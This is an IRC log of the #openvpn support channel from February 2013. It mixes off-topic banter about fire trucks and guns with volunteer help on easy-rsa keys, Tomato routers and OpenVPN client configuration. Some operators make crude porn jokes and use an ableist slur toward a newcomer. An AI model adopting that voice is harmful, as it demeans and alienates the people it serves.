<@novaflash> i knew a girl like that once 09:00 < fys> No, they have one of the few states that require a title be signed in front of a notary public. 09:00 < fys> And I need this title signed. 09:00 < EugeneKay> Car? 09:01 < fys> I'm not in Lousiana 09:01 < fys> Nah, scooter. 09:01 < EugeneKay> Close enough 09:01 * EugeneKay goes back to drooling over new fire trucks 09:01 < fys> New.. fire.. trucks? 09:01 < fys> Okay.. 09:01 < fys> o_o 09:01 <@novaflash> EugeneKay's experiencing his third childhood 09:01 < fys> lol 09:02 < EugeneKay> I'm a volunteer firefighter :-p 09:02 <@novaflash> it's actually still the first - he never grew out of it - but by counting the years of an average childhood, he's in his third childhood now 09:02 < EugeneKay> ....I'm only 24 09:02 <@novaflash> that's very laudable EugeneKay :) 09:02 < EugeneKay> And no, I didn't. :-p 09:02 < fys> I'm 24 too and not even close to exiting childhood. 09:02 <@novaflash> you young whippersnappers 09:03 < EugeneKay> But continuing my childhood is when I play with my legos(also mostly firefighter kits). This is srs bzns :-p 09:03 < rob0> EugeneKay! Me too! 09:03 < EugeneKay> Our dept is applying for a FEMA grant to get a new truck. So, I'm drooling. 09:03 <@novaflash> legos is serious. 09:03 <@novaflash> neat 09:03 < rob0> We got a nice new truck in late '11 09:03 < EugeneKay> Commercial chassis or a proper cabover? 09:03 <@novaflash> rob0; 1911? 09:04 < EugeneKay> No no, the 1911 is in it's holster in my underwear drawer 09:04 < EugeneKay> next to my 459 09:04 < rob0> let me see if I can google up a picture 09:04 < EugeneKay> And my 22 >_> 09:04 < EugeneKay> I think the .38 Special is in there too 09:04 -!- cosmicgate [~root@94.249.242.85] has joined #openvpn 09:04 < EugeneKay> Come to think of it, that's not the underwear drawer at all. It's the gun drawer. 09:05 <@novaflash> underwear is where i keep my biological gun 09:06 < EugeneKay> Anyway..... yeah, new truck :-D 09:06 < EugeneKay> Hopefully we get the grant 09:06 < rob0> This vehicle pictured above is an E-ONE Tradition ES Commercial Pumper mounted on a Prep M2 Chassis. Purchased by Chief Dewayne Lovelace and the Valley Grove Fire Department, 5th Distric of Tishomingo County, Belmont, Mississippi. Shop Order #136313. http://www.sunbeltfire.com/recent-deliveries.html top right 09:06 <@vpnHelper> Title: Sunbelt Fire - Serving the Fire industry (at www.sunbeltfire.com) 09:06 * EugeneKay looks to see if it came through today 09:06 < EugeneKay> Nice rig. Looks remarkably like the one we have spec'ed 09:06 < EugeneKay> Top-mount pump controls? 09:07 < rob0> yes, the walkway behind the cab 09:07 < EugeneKay> Very nice 09:07 < EugeneKay> Are your ladders under the hosebed or down the right ide? 09:07 < rob0> oh hey, Red Bay's truck is also there. "Big" nearby town. 09:08 < rob0> ladders on the right 09:08 -!- p3rror [~mezgani@2001:0:53aa:64c:2484:2fc2:d606:f5f2] has joined #openvpn 09:08 < EugeneKay> We're going for under-hose. We need the storage space 09:08 <@novaflash> ladies and gentleman, this is no longer #openvpn but #bigredfiretrucks 09:08 <@ecrist> i like to be under hoes. sometimes they're under me 09:09 < EugeneKay> Damn right it is 09:09 <@novaflash> ecrist: good moment to pitch in - i was just thinking how bigredfiretrucks could be a name for a porn site where the sluts handle guys with big hoses 09:09 < rob0> we also have an old tanker, converted milk truck. That's what we usually take to fires, because there are few fires in our area, we go as backup. And they want the water! 09:09 < EugeneKay> Damn, they haven't updated the list for today yet 09:09 * novaflash slaps BRAZZERS logo onto channel 09:10 <@ecrist> EugeneKay: what town are you looking for? 09:10 < EugeneKay> We have.... a 1984 Pierce pumper(second-hand from a NY dept), a big brush truck, two ~2000gallon tankers(one with 6x6), and a Chevy 350 pickup with a rescue body installed 09:10 -!- dazo is now known as dazo_afk 09:10 < EugeneKay> ecrist - I'm Fairview Rural Fire Dept, Arkansas 09:13 -!- p3rror [~mezgani@2001:0:53aa:64c:2484:2fc2:d606:f5f2] has quit [Max SendQ exceeded] 09:14 <@ecrist> that's a rather new fire dept 09:15 < EugeneKay> 80-something 09:15 <@ecrist> Filing date of Januar, 2004 09:15 <@ecrist> January* 09:15 <@ecrist> maybe the incorporation is new 09:15 < EugeneKay> The non-profit incorporation? 09:16 <@ecrist> yeah 09:16 <@ecrist> EIN 71-0688930 09:16 < EugeneKay> Yeah, no idea about that 09:16 < EugeneKay> I know the dept was started in the 80s 09:16 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 276 seconds] 09:16 <@ecrist> reported assets of $303,239 FY 2011 09:17 < EugeneKay> Sounds about right 09:17 < rob0> wow, them is some bucks! 09:17 < EugeneKay> I know our annual operating budget is ~$30k 09:17 <@ecrist> assets include equipment, rob0 09:17 < rob0> We have about a grand or so. 09:17 < rob0> county owns our equipment 09:17 <@ecrist> EugeneKay: operating budget FY was reported at $46,239 09:18 < EugeneKay> That includes the grant money :-p 09:18 < cosmicgate> not bad 09:19 < rob0> so your new truck will be in the $200K range? 09:19 < EugeneKay> Sounds right. I'm not on the board, so I don't know all the numbers offhand 09:19 < rob0> I think ours was ~$180K. 09:20 < EugeneKay> Buuuuut, it really comes down to whether we get the truck grant 09:20 < EugeneKay> I think they cover 80% of it 09:20 -!- krzee [nobody@hemp.ircpimps.org] has quit [Ping timeout: 245 seconds] 09:24 < EugeneKay> I want to get myself a new pickup next year, equip it out as a reserve unit. 09:25 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:35 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Read error: Connection reset by peer] 09:36 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has joined #openvpn 09:37 -!- nickanderson_afk is now known as nickanderson 09:50 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 248 seconds] 09:51 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has quit [Remote host closed the connection] 10:10 -!- MarKsaitis [~MarKsaiti@81.101.81.114] has quit [Ping timeout: 255 seconds] 10:12 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:19 -!- Orbi [~opera@anon-185-149.vpn.ipredator.se] has joined #openvpn 10:20 -!- diffen3 [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has joined #openvpn 10:21 -!- Diffen [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Read error: No route to host] 10:41 -!- cosmicgate [~root@94.249.242.85] has quit [Ping timeout: 248 seconds] 10:56 -!- raidz_away is now known as raidz 10:58 -!- AsadH is now known as zz_AsadH 11:02 -!- ben1066_ [~quassel@2a03:b200:9::824e:1e6e] has joined #openvpn 11:02 -!- ben1066_ [~quassel@2a03:b200:9::824e:1e6e] has quit [Changing host] 11:02 -!- ben1066_ [~quassel@unaffiliated/ben1066] has joined #openvpn 11:03 -!- ben1066 [~quassel@unaffiliated/ben1066] has quit [Read error: Connection reset by peer] 11:06 < RealRancor> Hi. Is anyone running IPv6 with openvpn? I'm trying to get this to work with OpenVPN 2.3 (on client and server) but can't get my client to communicate with the "outer world". 11:06 < RealRancor> My client is able to reach (ping) the IPs of the server, but not anything outside. 11:06 < RealRancor> The relevant details are posted here: 11:06 < RealRancor> http://pastebin.com/hLGAr14v 11:07 < RealRancor> The server is running on debian 6.0, the client on debian testing. 11:08 < RealRancor> Hope all needed infos are posted, if not please let me now. Any hints are welcome. 11:08 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 11:09 -!- corretico [~luis@190.211.93.38] has quit [Ping timeout: 260 seconds] 11:11 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has joined #openvpn 11:13 -!- corretico [~luis@190.211.93.38] has joined #openvpn 11:16 -!- thansen [~thansen@63-248-42-154.static.orml012.digis.net] has joined #openvpn 11:17 < thansen> seemingly randomly I'm getting a TLS_ERROR: BIO read tls_read_plaintext error: error:1408F06B:SSL routines:SSL3_GET_RECORD:bad decompression 11:18 < thansen> from my client. I just rebooted but had a working connection before the reboot so I'm assuming something has gone awry on my client machine 11:18 < thansen> anyone have a tip for me? 11:22 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has quit [Ping timeout: 276 seconds] 11:24 < lickalott> gents, trying to source ./vars and I keep getting this error "NOTE: If you run ./clean-all, I will be doing a rm -rf on /usr/share/doc/openvpn/examples/easy-rsa/2.0/keys" 11:24 < lickalott> I'm following this - http://tomatousb.org/tut:openvpn 11:24 <@vpnHelper> Title: OpenVPN - TomatoUSB (at tomatousb.org) 11:24 < lickalott> am I missing something? 11:24 < lickalott> *note* just for the key generation not the firmware 11:28 < RealRancor> lickalott: Mhhh, i got the same. This is just a NOTE, no error. 11:28 < RealRancor> Got the same note and all keys where generated here. 11:29 < lickalott> i don't see the keys dir 11:30 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 11:31 < RealRancor> source ./vars don't generate the keys, you have to follow the other steps 11:33 < lickalott> just worked 11:33 < lickalott> tks... I just assumed that the error was talking about /keys and that it needed to be there. 11:38 -!- Orbi [~opera@anon-185-149.vpn.ipredator.se] has quit [Quit: Orbi] 11:39 < lickalott> okay, i'm good on the keys now. here's my other question. I don't want to generate and/or store the keys on the router so i want my ubuntu server to be the CA (which seems to be the case now) Once in the admin GUI I can easily direct to the server for keys right? 11:46 -!- Greek-Boy [~Greek-Boy@41.138.223.11] has joined #openvpn 11:54 < Greek-Boy> Hello guys. Just need some advise on a OpenVPN setup. I have a Voip softswitch that routes calls to multiple branches that are behind NAT. I was thinking that I should make the softswitch an openvpn server and put a pfsense at each branch and connect them via openvpn. Is this advisable or is it perhaps better to have the softswitch establish an openvpn connection to each pfsense at branches? 12:04 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 12:15 <@ecrist> Greek-Boy: sounds smart to me 12:15 <@ecrist> then you don't need to deal with SRTP/SIPS between branches 12:16 < Greek-Boy> thanks 12:16 < Greek-Boy> just wanted to make sure that it makes sense 12:17 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has joined #openvpn 12:17 -!- C-S-B_ [~csb@host81-157-117-86.range81-157.btcentralplus.com] has quit [Read error: Connection reset by peer] 12:23 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Read error: Operation timed out] 12:24 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 248 seconds] 12:26 -!- Greek-Boy [~Greek-Boy@41.138.223.11] has quit [Remote host closed the connection] 12:26 -!- Greek-Boy [~Greek-Boy@41.138.223.11] has joined #openvpn 12:41 -!- dazo_afk is now known as dazo 12:42 < Greek-Boy> ecrist: Will openvpn be stable with good uptime? 12:49 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [Ping timeout: 256 seconds] 12:52 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 12:58 <@dazo> lickalott: you have the right approach, not having the CA on your openvpn box ... all you need on your openvpn server is dh*.pem, server.key, server.crt and ca.crt .... the clients only need client.key, client.crt and ca.crt 12:58 <@dazo> lickalott: your CA files (the easy-rsa files) can be completely off-line until you need to generate new keys/certs 13:00 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Remote host closed the connection] 13:02 <@ecrist> Greek-Boy: depends on your internet connection 13:02 <@ecrist> the only time our vpn link goes down is because of a general transport error of some sort 13:19 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 255 seconds] 13:20 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 264 seconds] 13:22 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:32 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 13:38 -!- [WDKevin] [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has joined #openvpn 13:41 -!- WDKevin [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has quit [Ping timeout: 248 seconds] 13:59 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 14:19 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has joined #openvpn 14:23 -!- novaflash is now known as novaflash_away 14:23 -!- novaflash_away is now known as novaflash 14:31 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 14:33 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 15:08 -!- thansen [~thansen@63-248-42-154.static.orml012.digis.net] has left #openvpn ["Ex-Chat"] 15:15 -!- r3zon8 [~r3zon8@vpn.interimhealthcare.com] has joined #openvpn 15:17 < r3zon8> someone using a syno nas as vpn server with ios clients? 15:22 < pekster> Probably not. There are folks here that have used openvpn in general with iOS clients though 15:50 -!- sam1 [~sam@194-236-182-101.customer.telia.com] has quit [Quit: sam1] 15:51 -!- MarKsaitis [~MarKsaiti@cpc4-rdng22-2-0-cust932.15-3.cable.virginmedia.com] has quit [Ping timeout: 255 seconds] 15:55 -!- ade_b [~Ade@koln-5d815f84.pool.mediaWays.net] has joined #openvpn 15:55 -!- ade_b [~Ade@koln-5d815f84.pool.mediaWays.net] has quit [Changing host] 15:55 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn 16:02 -!- Greek-Boy [~Greek-Boy@41.138.223.11] has quit [Ping timeout: 264 seconds] 16:02 -!- dazo is now known as dazo_afk 16:12 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep] 16:19 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn 16:22 -!- nickanderson is now known as nickanderson_afk 16:26 < EugeneKay> !notopenvpn 16:26 <@vpnHelper> "notopenvpn" is your problem is not about openvpn, and while we try to be helpful, you may have a better chance of finding your answer if you ask your question in a channel related to your problem 16:39 -!- ade_b [~Ade@redhat/adeb] has quit [Ping timeout: 248 seconds] 16:42 -!- MarKsaitis [~MarKsaiti@5e0533a1.bb.sky.com] has joined #openvpn 16:45 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Ping timeout: 248 seconds] 16:54 < Devastator> pekster, good evening, when you have the time to take a look, here it is: http://codepad.org/Q2ZncsQB 16:54 <@vpnHelper> Title: Plain Text code - 27 lines - codepad (at codepad.org) 16:54 < Devastator> thanks in advance for this 16:58 -!- emmanuelux [~emmanuelu@94.23.150.162] has joined #openvpn 17:11 -!- pa [~pa@unaffiliated/pa] has quit [Ping timeout: 248 seconds] 17:51 -!- nickanderson_afk is now known as nickanderson 17:51 -!- brute11k [~brute11k@89.249.235.89] has quit [Read error: Connection reset by peer] 17:52 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 17:53 -!- nickanderson is now known as nickanderson_afk 17:53 -!- nickanderson_afk is now known as nickanderson 17:55 -!- bjh4 [~bjh4@ool-4357696f.dyn.optonline.net] has quit [Remote host closed the connection] 17:59 -!- emmanuel__ [~emmanuelu@94.23.150.162] has joined #openvpn 18:00 -!- emmanuelux [~emmanuelu@94.23.150.162] has quit [Quit: emmanuelux] 18:00 -!- emmanuel__ [~emmanuelu@94.23.150.162] has quit [Read error: Connection reset by peer] 18:05 -!- brute11k [~brute11k@89.249.235.89] has quit [Read error: Connection reset by peer] 18:07 -!- diffen3 [~diffen@c-7476e555.042-17-73746f11.cust.bredbandsbolaget.se] has quit [Quit: Leaving] 18:09 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 18:14 -!- nickanderson is now known as nickanderson_afk 18:17 -!- brute11k [~brute11k@89.249.235.89] has quit [Read error: Connection reset by peer] 18:17 -!- krzee [nobody@hemp.ircpimps.org] has joined #openvpn 18:17 -!- krzee [nobody@hemp.ircpimps.org] has quit [Changing host] 18:17 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 18:18 -!- mode/#openvpn [+o krzee] by ChanServ 18:19 -!- brute11k [~brute11k@89.249.235.89] has joined #openvpn 18:21 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Quit: No Ping reply in 180 seconds.] 18:21 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 18:23 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has joined #openvpn 18:26 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [] 18:27 -!- MeanderingCode [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Ping timeout: 264 seconds] 18:51 -!- nickanderson_afk is now known as nickanderson 19:03 -!- mattwj2002 [~matt@wikisource/pdpc.active.mattwj2002] has joined #openvpn 19:04 -!- raidz is now known as raidz_away 19:04 < mattwj2002> community edition? 19:04 <@ecrist> what? 19:05 < mattwj2002> what is the free version like? 19:05 <@ecrist> are you an AS user? 19:05 <@ecrist> !as 19:05 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server 19:05 < mattwj2002> actually not yet 19:06 <@ecrist> AS has a nice GUI/web page 19:06 < mattwj2002> I just wanted to know how hard the open source version is 19:06 <@ecrist> the open-source version requires you create a config with a file 19:06 <@ecrist> it's not that hard, as long as you're not retarded 19:06 < mattwj2002> :) 19:06 <@ecrist> !howto 19:06 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 19:07 < mattwj2002> no paying per user? 19:07 <@ecrist> nope 19:07 < mattwj2002> sweet 19:07 < rob0> Free software is never like that. 19:08 -!- DrCode [~DrCode@gateway/tor-sasl/drcode] has joined #openvpn 19:08 < mattwj2002> good point 19:08 < mattwj2002> or connection whatever 19:08 < mattwj2002> :) 19:17 -!- cosmicgate [~root@94.249.242.85] has joined #openvpn 19:17 -!- cosmicgate is now known as Guest20058 19:21 -!- mattwj2002 [~matt@wikisource/pdpc.active.mattwj2002] has left #openvpn [] 19:24 -!- MarKsaitis [~MarKsaiti@5e0533a1.bb.sky.com] has quit [Ping timeout: 260 seconds] 19:26 -!- hg_5_ [~chatzilla@91.234.245.245] has joined #openvpn 19:26 -!- nickanderson is now known as nickanderson_afk 19:27 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 252 seconds] 19:44 -!- nickanderson_afk is now known as nickanderson 19:44 -!- Guest20058 [~root@94.249.242.85] has quit [Ping timeout: 248 seconds] 19:53 -!- hg_5_ [~chatzilla@91.234.245.245] has quit [Read error: Connection reset by peer] 19:54 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 19:55 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Client Quit] 20:02 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has quit [] 20:08 -!- NuclearMeltdown is now known as UNFLUORIDATED 20:13 -!- UNFLUORIDATED is now known as UnFluoridated 20:17 -!- cyberspace- [20253@ninthfloor.org] has quit [Remote host closed the connection] 20:17 -!- cyberspace- [20253@ninthfloor.org] has joined #openvpn 20:27 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 20:48 < cirdan> ≈hey i setup openvpn tap on dd-wrt. It works great accessing my LAN but when I try to push all traffic over the vpn I can't get past my main router. lan is 10.0.0.0 vpn is 10.0.4.0 I thought I put the right iptables line in to mask the connection but maybe not. 20:50 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 20:57 -!- MeanderingCode_ [~Meanderin@71-213-164-111.albq.qwest.net] has quit [Remote host closed the connection] 20:58 < cirdan> ah nevermind. the howto fixed it :-) 21:12 -!- [p0rk] [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has joined #openvpn 21:14 -!- erry [erry@freenode/staff/erry] has quit [Read error: Operation timed out] 21:14 -!- erry [erry@freenode/staff/erry] has joined #openvpn 21:14 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Read error: Operation timed out] 21:15 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has quit [Read error: Operation timed out] 21:15 -!- kisom [~kisom@c-75dce155.648-1-64736c11.cust.bredbandsbolaget.se] has joined #openvpn 21:15 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 21:15 -!- [WDKevin] [~WDKevin@173-163-136-177-centralpennsylvania.hfc.comcastbusiness.net] has quit [Ping timeout: 256 seconds] 22:31 -!- nutron [~nutron@unaffiliated/nutron] has quit [Quit: I must go eat my cheese!] 22:43 -!- nickanderson is now known as nickanderson_afk 23:03 -!- UnFluoridated is now known as NuclearMeltdown 23:08 -!- pa [~pa@unaffiliated/pa] has joined #openvpn 23:28 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 264 seconds] 23:30 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 23:34 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 248 seconds] 23:42 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 23:42 -!- md_5 [md_5@mcdevs/trusted/md-5] has joined #openvpn 23:44 -!- Guest20058 [~root@94.249.242.85] has joined #openvpn 23:46 < md_5> Is there a way I can make openvpn do this: 10.0.0.1 connects to port 1234 on server 11.0.0.0.. 11.0.0.0 forwards to 12.0.0.0:1234 . The application on 12.0.0.0:1234 transparently sees the connection as coming from 10.0.0.1 23:47 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 244 seconds] 23:55 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 23:59 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 252 seconds] --- Day changed Sat Feb 09 2013 00:02 -!- Devastator [~devas@unaffiliated/devastator] has quit [] 00:04 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 00:06 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection] 00:08 -!- rych [~root@94.249.242.85] has joined #openvpn 00:10 -!- Guest20058 [~root@94.249.242.85] has quit [Ping timeout: 248 seconds] 00:12 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 00:14 -!- Guest20058 [~root@94.249.242.85] has joined #openvpn 00:16 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Ping timeout: 240 seconds] 00:17 -!- rych [~root@94.249.242.85] has quit [Ping timeout: 248 seconds] 00:18 -!- Guest20058 [~root@94.249.242.85] has quit [Ping timeout: 248 seconds] 00:18 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 00:20 < lickalott> gents, following this guide - http://www.serverwatch.com/tutorials/article.php/3924556/Setting-Up-a-VPN-Server-on-a-Tomato-Router-Part-2.htm but the version is different so not all the settings are lining up. Does anyone know of a different/better guide? 00:20 <@vpnHelper> Title: Setting Up a VPN Server on a Tomato Router, Part 2 (at www.serverwatch.com) 00:20 < lickalott> I can't get the service to start 00:22 < pekster> The supported configuration guide is: 00:22 < pekster> !howto 00:22 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror 00:23 < pekster> Most folks here don't like dealing with frontends since that's the responsible of the person/group maintaining it to support. If tomato web config isn't working, you should ask them why. The openvpn program loads settings from a configuration file and command-line arguments 00:23 < pekster> responsibility* 00:23 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 00:25 < lickalott> I think it is more of a stupidity thing (on my part) than a "not working" thing on thiers... Figured I'd come to the masters. I'll see if they have anything to say, but the last 4 times I've posted in that chan i got no responses. Thanks for the assist though. 00:26 < pekster> No idea what you mean "the version is diffferent and not all the settings are lining up" 00:27 < pekster> We can help if you post your openvpn settings. That guide doesn't show me any VPN settings, or yours speciifically; obviously troubleshooting your issue requires knowing how *your* system is set up, what's not working, what you've tried, and configs/logs for your setup 00:27 < pekster> The howto link above tells you how to use OpenVPN. If you want to use something that "makes openvpn work automagically for you" this isn't the place for that. Something about "teach a man to fish..." 00:28 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Ping timeout: 256 seconds] 00:31 < lickalott> copy all 00:31 < lickalott> wasn't looking for a hand out. just an up to date tut on configuring. 00:32 < lickalott> the link i posted must've come from an older version of tomato with openvpn embedded in the FW. the screenshots don't match up to what my router page is showing. 00:32 < pekster> Yea, I get that. The problem is frontends and GUI tools have a way of hiding what's actually going on. That makes it borderline for those of us that deal with the actual openvpn project to know what's wrong, and we have better things to do than learn how every tool someone wrote works. Many of them work poorly to boot 00:33 < pekster> Logs would be a great place to start if the service fails to start 00:33 < pekster> !logs 00:33 <@vpnHelper> "logs" is (#1) is please pastebin your logfiles from both client and server with verb set to 5 or (#2) In the Windows client(OpenVPN-GUI) right-click the status icon and pick View Log or (#3) In the OS X client(Tunnelblick) right-click it nd select Copy log text to clipboard or (#4) if you dont know how to find your logs, see !logfile 00:34 < lickalott> gotcha. Lemme mess around more if i get stuck I'll know how to provide the right questions and where to go. :D 00:37 -!- Aegela [~Aegela@180.249.40.39] has joined #openvpn 00:39 -!- Aegela [~Aegela@180.249.40.39] has left #openvpn [] 00:40 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 00:42 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection] 00:45 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 00:48 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection] 00:51 -!- cirdan [~chris@c-69-248-228-142.hsd1.nj.comcast.net] has quit [Quit: leaving] 01:10 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 01:12 < lickalott> k... I'm back pekster - http://pastebin.com/XtrqYze4 01:12 < lickalott> the service tries to start but seems to get denied. 01:13 < lickalott> I've forwarded the port. put all the keys in where they need to go and believe all the settings are correct. 01:13 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection] 01:14 < lickalott> oh..and ensured NTP was set to North America 01:16 < pekster> That's missing log details prior to the first line. That said, the process exist on line 16 of that output by an interrupt signal. Either something send openvpn a signal to exit, or one of the options to exit was met 01:18 < pekster> Oh, I see, you just had a trailing line from earlier log out; line 1 isn't from that invocation 01:18 < lickalott> prior to the first line was all failures because I didn't have the correct .pem 01:19 < lickalott> I updated the time and set the NTP then I rebooted and the service is started now. but i'm getting this - Unable to obtain Session ID from 192.168.1.1:1194: XML-RPC: ConnectionRefusedError: 10061: No connection could be made because the target machine actively refused it.. 01:20 < lickalott> if this something I can test from within the network? i have a DNS that I tried but got the same result 01:20 < pekster> The errors you just listed aren't from openvpn 01:20 < pekster> So, no clue 01:20 < lickalott> they came from the client 01:21 < lickalott> after authentication that error popped up 01:22 < pekster> OpenVPN does not use XMP-RPC or write to the log about obtaining a "Session ID" 01:22 < pekster> XML-RPC* 01:22 < pekster> Don't even worry about the client until your server starts up properly and doesn't exit 4 seconds after it starts 01:24 < lickalott> I think I'm there. I now show General Statistics and maxbcast/mcast queue length 0 on the status tab 01:24 < lickalott> emphasis on think 01:25 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 01:25 < lickalott> http://tinypic.com/r/1tokyc/6 01:25 <@vpnHelper> Title: Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting (at tinypic.com) 01:26 < pekster> Apparently that's "Access Server" which isn't supported here; that's a commercial VPN product and supported by the commercial support team that runs it. If you use the open-source openvpn platform, you must use the open-source client 01:26 < pekster> !download 01:26 <@vpnHelper> "download" is (#1) http://openvpn.net/index.php/download/community-downloads.html to download openvpn or (#2) OpenVPN's Windows installer now includes OpenVPN GUI. Don't bother with http://openvpn.se anymore or (#3) Don't trust download.com at all. It provides an extremely old version with malware: http://insecure.org/news/download-com-fiasco.html or (#4) in the community version of openvpn (only 01:26 <@vpnHelper> thing supported here) there is no separate download for client/server, it is the same install with different configs 01:27 < pekster> Also, I just looked up that code, and the logs actually look okay (I mixed up the codes, and that's just to query the list of connected clients, so, the server is at least starting up successfully) 01:27 < lickalott> Ahhhhh 01:29 < lickalott> downloading now. 01:30 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection] 01:35 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has quit [Read error: Operation timed out] 01:38 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 01:42 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection] 01:51 -!- lickalott [~lickalott@127.0.0.1.silentkiller.cc] has joined #openvpn 01:55 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 02:00 -!- hive-mind [pranq@unaffiliated/contempt] has quit [Remote host closed the connection] 02:01 < lickalott> well that sucked... 02:01 < lickalott> tried to setup the client side and lost the router. 02:03 < pekster> "lost the router" ? 02:09 < lickalott> unresponsive 02:09 < lickalott> had to reset it to get it back. 02:09 < lickalott> no biggie 02:09 < lickalott> i do have one more question, then I'll leave it alone for the night. 02:09 < lickalott> how can I clear the server list cache in the client GUI? 02:11 < pekster> You mean the Windows tray icon "OpenVPN GUI" program? 02:11 < lickalott> yes 02:12 < pekster> That's not a cache; it shows you configuration files at it's reference location, by default \config\ 02:13 < pekster> If you have only one it gives you commands to interact with it; if you have >1 it shows you a list, each of which can independently interact with that configuration 02:13 < lickalott> you, my friend, are an animal. Thanks for all your time! 02:18 -!- hive-mind [~hivemind@unaffiliated/contempt] has joined #openvpn 02:18 -!- hive-mind [~hivemind@unaffiliated/contempt] has quit [Remote host closed the connection] 02:18 -!- hive-mind [pranq@unaffiliated/contempt] has joined #openvpn 02:19 < lickalott> only file in that path is key.txt 02:21 < pekster> Then the GUI will have no knowledge of any configurations to use (IIRC, it might not refresh its view of available config files without a restart 02:21 < pekster> Of the tray icon GUI application, not of your PC, to clarify 02:22 < lickalott> already did that. no change. 02:22 < pekster> Then it 